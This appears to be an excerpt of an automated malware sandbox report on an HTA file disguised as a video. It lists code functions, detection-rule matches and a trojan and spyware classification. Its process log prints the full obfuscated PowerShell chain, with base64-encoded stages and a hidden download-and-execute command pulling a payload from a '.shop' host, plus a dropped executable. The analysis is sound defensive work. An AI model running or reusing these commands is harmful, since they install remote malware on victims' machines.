                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0041597119_2_00415971
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0041C91019_2_0041C910
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0040692019_2_00406920
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0042D12019_2_0042D120
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_004419C019_2_004419C0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_004399E119_2_004399E1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0043E98019_2_0043E980
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0040399019_2_00403990
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0041619719_2_00416197
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_004329BC19_2_004329BC
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0041924919_2_00419249
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00409A6019_2_00409A60
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0041DA6019_2_0041DA60
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0041A21019_2_0041A210
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0041822519_2_00418225
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0042FAC819_2_0042FAC8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00440A8419_2_00440A84
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0044128019_2_00441280
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00411A9119_2_00411A91
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0043C2B019_2_0043C2B0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0043BAB019_2_0043BAB0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0040434019_2_00404340
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0044235019_2_00442350
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0041D31019_2_0041D310
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0042531019_2_00425310
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00418B1B19_2_00418B1B
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00426BC619_2_00426BC6
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0041F3E019_2_0041F3E0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00402B8019_2_00402B80
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0044138019_2_00441380
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00414B9019_2_00414B90
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00405BA019_2_00405BA0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_004283B019_2_004283B0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0042FBBD19_2_0042FBBD
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0041CC5919_2_0041CC59
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0042FC0C19_2_0042FC0C
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00424C1019_2_00424C10
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0042FC1819_2_0042FC18
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0043542419_2_00435424
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00441C3019_2_00441C30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0043BCC019_2_0043BCC0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_004334C619_2_004334C6
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00435C8019_2_00435C80
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0040649019_2_00406490
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0041649019_2_00416490
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00421CA019_2_00421CA0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0040954019_2_00409540
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0043F54019_2_0043F540
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0044154019_2_00441540
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0041857719_2_00418577
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0042E52019_2_0042E520
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0040ADC019_2_0040ADC0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_004415D019_2_004415D0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00428FC719_2_00428FC7
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_004275AC19_2_004275AC
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00416DBD19_2_00416DBD
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0044166019_2_00441660
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00429E7019_2_00429E70
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0042560019_2_00425600
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0044260019_2_00442600
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0042860F19_2_0042860F
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00426BC619_2_00426BC6
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00417ED019_2_00417ED0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_004306D019_2_004306D0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00404E8019_2_00404E80
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0041969019_2_00419690
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0043A69019_2_0043A690
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0042A69419_2_0042A694
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0040CF4019_2_0040CF40
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00441F5019_2_00441F50
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00438F6319_2_00438F63
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00402F7019_2_00402F70
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0042577119_2_00425771
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0040770019_2_00407700
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0042370919_2_00423709
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0043F71219_2_0043F712
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0042EF3D19_2_0042EF3D
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00428FC719_2_00428FC7
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_004337F119_2_004337F1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0042179019_2_00421790
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: String function: 00408230 appears 48 times
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: String function: 00414B80 appears 98 times
                Source: 2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe.19.drStatic PE information: No import functions for PE file found
                Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                Source: Process Memory Space: powershell.exe PID: 7324, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 7700, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: classification engineClassification label: mal100.troj.spyw.evad.winHTA@18/12@3/3
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0043B120 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,19_2_0043B120
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7332:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7708:120:WilError_03
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7484:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4d3eqhv2.agy.ps1Jump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\web55.mp4.hta"
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ep Unrestricted -w 1 sc $env:Temp\a.ps1 ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gS0ZiQygkS3lHWXJVVUQpew0KKCgkS3lHWXJVVUQgLXNwbGl0ICcoPzw9XEcuLiknfCV7JEVKdXAuU3ViU3RyaW5nKDMsMTAwKVskX119KSAgLWpvaW4gJycgLXJlcGxhY2UgIi4kIil9OyRFSnVwID0naWV4bXZ7dU4xaUtGZSJBT0V1Vnk1Im9ZezZQbFBhLzphYjRJWi5PYjJxLTdXO0NkSFxneFF3L016SkFqcnQzQDZCfUROJX5UblUofTBRc3NfaCVoSWZrKWM5WEw4NCNAUnlTKm9HcDY1MDk1ODM0NDEwOTM2NDMyNDA2MDk2OTU4Jw==')));cmd.exe /k start powershell -w 1 ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93ZXJzaGVsbCAtZW5jIFV3QjBBR0VBY2dCMEFDMEFVQUJ5QUc4QVl3QmxBSE1BY3dBZ0FDSUFRd0E2QUZ3QVZ3QnBBRzRBWkFCdkFIY0Fjd0JjQUZNQWVRQnpBRmNBYndCM0FEWUFOQUJjQUZjQWFRQnVBR1FBYndCM0FITUFVQUJ2QUhjQVpRQnlBRk1BYUFCbEFHd0FiQUJjQUhZQU1RQXVBREFBWEFCd0FHOEFkd0JsQUhJQWN3Qm9BR1VBYkFCc0FDNEFaUUI0QUdVQUlnQWdBQzBBUVFCeUFHY0FkUUJ0QUdVQWJnQjBBRXdBYVFCekFIUUFJQUFpQUMwQWR3QWdBR2dBYVFCa0FHUUFaUUJ1QUNBQUxRQmxBSEFBSUFCaUFIa0FjQUJoQUhNQWN3QWdBQzBBYmdCdkFIQUFJQUF0QUVNQWJ3QnRBRzBBWVFCdUFHUUFJQUJnQUNJQWFRQmxBSGdBSUFBb0FDZ0FUZ0JsQUhjQUxRQlBBR0lBYWdCbEFHTUFkQUFnQUZNQWVRQnpBSFFBWlFCdEFDNEFUZ0JsQUhRQUxnQlhBR1VBWWdCREFHd0FhUUJsQUc0QWRBQXBBQzRBUkFCdkFIY0FiZ0JzQUc4QVlRQmtBRk1BZEFCeUFHa0FiZ0JuQUNnQUp3Qm9BSFFBZEFCd0FITUFPZ0F2QUM4QWR3QmxBR0lBTGdCckFHd0FhUUJ3QUdRQWVRQjNBRzhBZWdCcEFIa0FMZ0J6QUdnQWJ3QndBQzhBYXdCMUFHNEFiZ0JoQUhJQUxnQndBRzRBWndBbkFDa0FLUUJnQUNJQUlnQWdBQzBBVndCcEFHNEFaQUJ2QUhjQVV3QjBBSGtBYkFCbEFDQUFTQUJwQUdRQVpBQmxBRzRBOy4gJGVudjpUZW1wXGEucHMxOyBmdW5jdGlvbiBLeUdZclVVRCgpe2Z1bmN0aW9uIGV6cENNZGhHUSgkckhQZWIpe2lmKCEoVGVzdC1QYXRoIC1QYXRoICRUaEJFWHBpVk8pKXtjdXJsIChLRmJDICRySFBlYikgLW8gJFRoQkVYcGlWT319fUt5R1lyVVVEOw==')))
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /k start powershell -w 1 "powershell -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AdwBlAGIALgBrAGwAaQBwAGQAeQB3AG8AegBpAHkALgBzAGgAbwBwAC8AawB1AG4AbgBhAHIALgBwAG4AZwAnACkAKQBgACIAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4A;. $env:Temp\a.ps1; function KyGYrUUD(){function ezpCMdhGQ($rHPeb){if(!(Test-Path -Path $ThBEXpiVO)){curl (KFbC $rHPeb) -o $ThBEXpiVO}}}KyGYrUUD;"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 "powershell -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AdwBlAGIALgBrAGwAaQBwAGQAeQB3AG8AegBpAHkALgBzAGgAbwBwAC8AawB1AG4AbgBhAHIALgBwAG4AZwAnACkAKQBgACIAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4A;. $env:Temp\a.ps1; function KyGYrUUD(){function ezpCMdhGQ($rHPeb){if(!(Test-Path -Path $ThBEXpiVO)){curl (KFbC $rHPeb) -o $ThBEXpiVO}}}KyGYrUUD;"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AdwBlAGIALgBrAGwAaQBwAGQAeQB3AG8AegBpAHkALgBzAGgAbwBwAC8AawB1AG4AbgBhAHIALgBwAG4AZwAnACkAKQBgACIAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://web.klipdywoziy.shop/kunnar.png'))"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe "C:\Users\user~1\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe"
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ep Unrestricted -w 1 sc $env:Temp\a.ps1 ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gS0ZiQygkS3lHWXJVVUQpew0KKCgkS3lHWXJVVUQgLXNwbGl0ICcoPzw9XEcuLiknfCV7JEVKdXAuU3ViU3RyaW5nKDMsMTAwKVskX119KSAgLWpvaW4gJycgLXJlcGxhY2UgIi4kIil9OyRFSnVwID0naWV4bXZ7dU4xaUtGZSJBT0V1Vnk1Im9ZezZQbFBhLzphYjRJWi5PYjJxLTdXO0NkSFxneFF3L016SkFqcnQzQDZCfUROJX5UblUofTBRc3NfaCVoSWZrKWM5WEw4NCNAUnlTKm9HcDY1MDk1ODM0NDEwOTM2NDMyNDA2MDk2OTU4Jw==')));cmd.exe /k start powershell -w 1 ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93ZXJzaGVsbCAtZW5jIFV3QjBBR0VBY2dCMEFDMEFVQUJ5QUc4QVl3QmxBSE1BY3dBZ0FDSUFRd0E2QUZ3QVZ3QnBBRzRBWkFCdkFIY0Fjd0JjQUZNQWVRQnpBRmNBYndCM0FEWUFOQUJjQUZjQWFRQnVBR1FBYndCM0FITUFVQUJ2QUhjQVpRQnlBRk1BYUFCbEFHd0FiQUJjQUhZQU1RQXVBREFBWEFCd0FHOEFkd0JsQUhJQWN3Qm9BR1VBYkFCc0FDNEFaUUI0QUdVQUlnQWdBQzBBUVFCeUFHY0FkUUJ0QUdVQWJnQjBBRXdBYVFCekFIUUFJQUFpQUMwQWR3QWdBR2dBYVFCa0FHUUFaUUJ1QUNBQUxRQmxBSEFBSUFCaUFIa0FjQUJoQUhNQWN3QWdBQzBBYmdCdkFIQUFJQUF0QUVNQWJ3QnRBRzBBWVFCdUFHUUFJQUJnQUNJQWFRQmxBSGdBSUFBb0FDZ0FUZ0JsQUhjQUxRQlBBR0lBYWdCbEFHTUFkQUFnQUZNQWVRQnpBSFFBWlFCdEFDNEFUZ0JsQUhRQUxnQlhBR1VBWWdCREFHd0FhUUJsQUc0QWRBQXBBQzRBUkFCdkFIY0FiZ0JzQUc4QVlRQmtBRk1BZEFCeUFHa0FiZ0JuQUNnQUp3Qm9BSFFBZEFCd0FITUFPZ0F2QUM4QWR3QmxBR0lBTGdCckFHd0FhUUJ3QUdRQWVRQjNBRzhBZWdCcEFIa0FMZ0J6QUdnQWJ3QndBQzhBYXdCMUFHNEFiZ0JoQUhJQUxnQndBRzRBWndBbkFDa0FLUUJnQUNJQUlnQWdBQzBBVndCcEFHNEFaQUJ2QUhjQVV3QjBBSGtBYkFCbEFDQUFTQUJwQUdRQVpBQmxBRzRBOy4gJGVudjpUZW1wXGEucHMxOyBmdW5jdGlvbiBLeUdZclVVRCgpe2Z1bmN0aW9uIGV6cENNZGhHUSgkckhQZWIpe2lmKCEoVGVzdC1QYXRoIC1QYXRoICRUaEJFWHBpVk8pKXtjdXJsIChLRmJDICRySFBlYikgLW8gJFRoQkVYcGlWT319fUt5R1lyVVVEOw==')))Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /k start powershell -w 1 "powershell -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AdwBlAGIALgBrAGwAaQBwAGQAeQB3AG8AegBpAHkALgBzAGgAbwBwAC8AawB1AG4AbgBhAHIALgBwAG4AZwAnACkAKQBgACIAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4A;. $env:Temp\a.ps1; function KyGYrUUD(){function ezpCMdhGQ($rHPeb){if(!(Test-Path -Path $ThBEXpiVO)){curl (KFbC $rHPeb) -o $ThBEXpiVO}}}KyGYrUUD;"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 "powershell -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AdwBlAGIALgBrAGwAaQBwAGQAeQB3AG8AegBpAHkALgBzAGgAbwBwAC8AawB1AG4AbgBhAHIALgBwAG4AZwAnACkAKQBgACIAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4A;. $env:Temp\a.ps1; function KyGYrUUD(){function ezpCMdhGQ($rHPeb){if(!(Test-Path -Path $ThBEXpiVO)){curl (KFbC $rHPeb) -o $ThBEXpiVO}}}KyGYrUUD;"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AdwBlAGIALgBrAGwAaQBwAGQAeQB3AG8AegBpAHkALgBzAGgAbwBwAC8AawB1AG4AbgBhAHIALgBwAG4AZwAnACkAKQBgACIAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AJump to behavior
